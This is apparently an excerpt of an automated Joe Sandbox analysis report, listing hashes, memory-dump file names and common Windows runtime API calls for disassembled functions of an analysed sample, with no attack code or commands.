                                                                                                                                                                                                                                              • Instruction ID: 422e6517f7a3fbebe2d0adfdeacef001c695d9ea08c0626b0031401eb44d83f6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74c318c544fdcdd5763c1011f60c09db72ac95fdcd372deb902ef073de02fd8d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBD05E49B2D60681EF6D5B5AB6B0AB84261AF4DBC0FC45174DE2E0F7CDEE5CE0418700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,?,?,00000000,?,00007FFDFAB8EDBF,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFAB8BBF5
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,?,?,00000000,?,00007FFDFAB8EDBF,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFAB8BC25
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                                              • Opcode ID: 2df5faf9bf7cd10c1a41e245987d1ce7abf9915188a6e8557421e9455e854664
                                                                                                                                                                                                                                              • Instruction ID: d847c23d5d1d8f18a6c25dd6fec3f26af03a89b2cfd34cb4b4c33be53d8777a0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2df5faf9bf7cd10c1a41e245987d1ce7abf9915188a6e8557421e9455e854664
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1419A65718B4686EF68CF69E4A163D7391FB88B80F448039DB5E87799DE3CE4468700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF62C10A9D5,?,?,00000000,00007FF62C10AA8A), ref: 00007FF62C10ABC6
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C10A9D5,?,?,00000000,00007FF62C10AA8A), ref: 00007FF62C10ABD0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                              • Instruction ID: e44467442982660bee0f7ba99827ccffcc611e9aefa720807015ca38e68369dc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE21C311B5C68241FEA497659C9A37D2682AF85BB4F084239DE2EC77D6CEACE4614302
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                              • Instruction ID: a4ed867bf87904d30e02c5eb1282ea5cbfb8a4aeaac34864db7a2b02f9854bba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6741C23291864587EE349B29A94A27D77A0FF55BA0F140131EF8EC36D1DF6CE412CB52
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                                              • Opcode ID: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                              • Instruction ID: d56928fdee3c987d9d3b57c350c916d8eab6ef25b33b240f49331e8f89baf7e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3021E721B186514AFE909B226C053FA9741BF46BE4FD84430EE0C87786CF7EE091C30A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                              • Instruction ID: 9cb15247dac7a13f397976ee6d40729d6faafa5835ea6b1d42d4fbaf85120410
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC318162A18A4285FF11AB558C4B37C2A90BF80BB4F424135EE5D873D2EFBCE4618713
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                                              • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                              • Instruction ID: f8195fba7d6a3d9f75d43c199d8ef3414ad42b3c16e21b38851ddd6e122addb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE21A172E05B4589EF249FA4C89A2EC33A0FB14728F444636DB5C86AD9DF38D554C741
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction ID: bdbe6ada64360f091855be2812b099e18cc36867a8fad5b402d1b8833956a7bf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F119031A1C64282EE60AF119C0A27DA364BF85BA4F444431FF8CD7A96CF3DE4219706
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction ID: 9ef281fe64b46a4ebce0232347a78a9b5675b95fd3416e6abbc1af1c79661d40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A21B032A18A8186EF618F1CD84637976A0FB94BA4F144234EA5DC76D9DF7DD8118B01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction ID: ed141f50c82a8031c967e7c792f1b6cc904d3698c3d3e6579489e03002e93b41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B01C421B08B4580EE04DF529D0A0A9A791BF95FF0F488631EE5CD3BD6DE3CD4218345
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62C0F45F4,00000000,00007FF62C0F1985), ref: 00007FF62C0F93C9
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00007FF62C0F6476,?,00007FF62C0F336E), ref: 00007FF62C0F8EA2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2592636585-0
                                                                                                                                                                                                                                              • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                              • Instruction ID: da95320e510be72ecea24a91d98782455881a8429a580d3e3e18757549253535
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D08C01F2825546EE44A76BBA4B6295252AB89BD0F88C035EE0D43B4ADC3CC0914B04
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                                              • Opcode ID: 3e74cb12bfa4fe274cd368df48ff49ce497d72bee849dd2a93d073e759ce18c8
                                                                                                                                                                                                                                              • Instruction ID: 70a4c0947169ebe68d04133cf7b7caa65e1d4cadd498c1b331b3019739d98f97
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e74cb12bfa4fe274cd368df48ff49ce497d72bee849dd2a93d073e759ce18c8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32C15F36B09A82C5EB68DF25E964ABC73A4FF44B94F8541B5CA6D066DCDF3CE5808700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,?,?,?,00000000,00007FFDFAB8B95E,?,?,?,?,00000000,00007FFDFAB8B9DE,?,?,00000000,00007FFDFAB89F93), ref: 00007FFDFAB8CA9E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                                              • Opcode ID: 60c4c729239b9c867ec044f782410759a4c661c8a66380dad805bbaf6a771bfd
                                                                                                                                                                                                                                              • Instruction ID: fb88c2dfd8251fdb009e34fce40c05de272508c2feb0b6ccb432127c08b895ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60c4c729239b9c867ec044f782410759a4c661c8a66380dad805bbaf6a771bfd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F416F66708B4681EB58CF26E828B6977A0FB45B84F484475DEAD0B7A8DF3DE056C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                                              • Opcode ID: b3616b0bc1ce52ce2adb7af58cda7d4ecbf03f1f14e84b775dec997ef8b66b01
                                                                                                                                                                                                                                              • Instruction ID: 8d9792681597723834da8b360d18478660e6e057580bc7b6bc8fb0db40883fea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3616b0bc1ce52ce2adb7af58cda7d4ecbf03f1f14e84b775dec997ef8b66b01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9417629B09A4686EF5D9B5AE46093973A0FF44B80F488075CE2D0B7D8DF3CE4928704
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                                              • Opcode ID: 30d5bdf936aecc5dd494e9278e6ce7eef71ff3bb089f5e87c603ecd981622aab
                                                                                                                                                                                                                                              • Instruction ID: 6e400fa42458e24b21e94b2ae11585569384c36152c2ad2e65efb0e563fea11e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30d5bdf936aecc5dd494e9278e6ce7eef71ff3bb089f5e87c603ecd981622aab
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59319032A047418BD768CF29E210A6D77A0FB04B84F448079DB5D5BB8DCB7CE5A1CB40
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                                                                              • Opcode ID: 64cbdefbcd847917ee2580073db156037acbf6d0a1a76d5943a3ecb8b1fc0262
                                                                                                                                                                                                                                              • Instruction ID: 8bbec73b8658ad4489b563b4b45d6e05ae3a8d78338d9699c4fdde24601f5e25
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64cbdefbcd847917ee2580073db156037acbf6d0a1a76d5943a3ecb8b1fc0262
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7119151B1D68240EF5D9716B274A7E92519F49FC4F881472EE6E0BBCDEF6CE4828300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF62C100C90,?,?,?,00007FF62C1022FA,?,?,?,?,?,00007FF62C103AE9), ref: 00007FF62C10D63A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
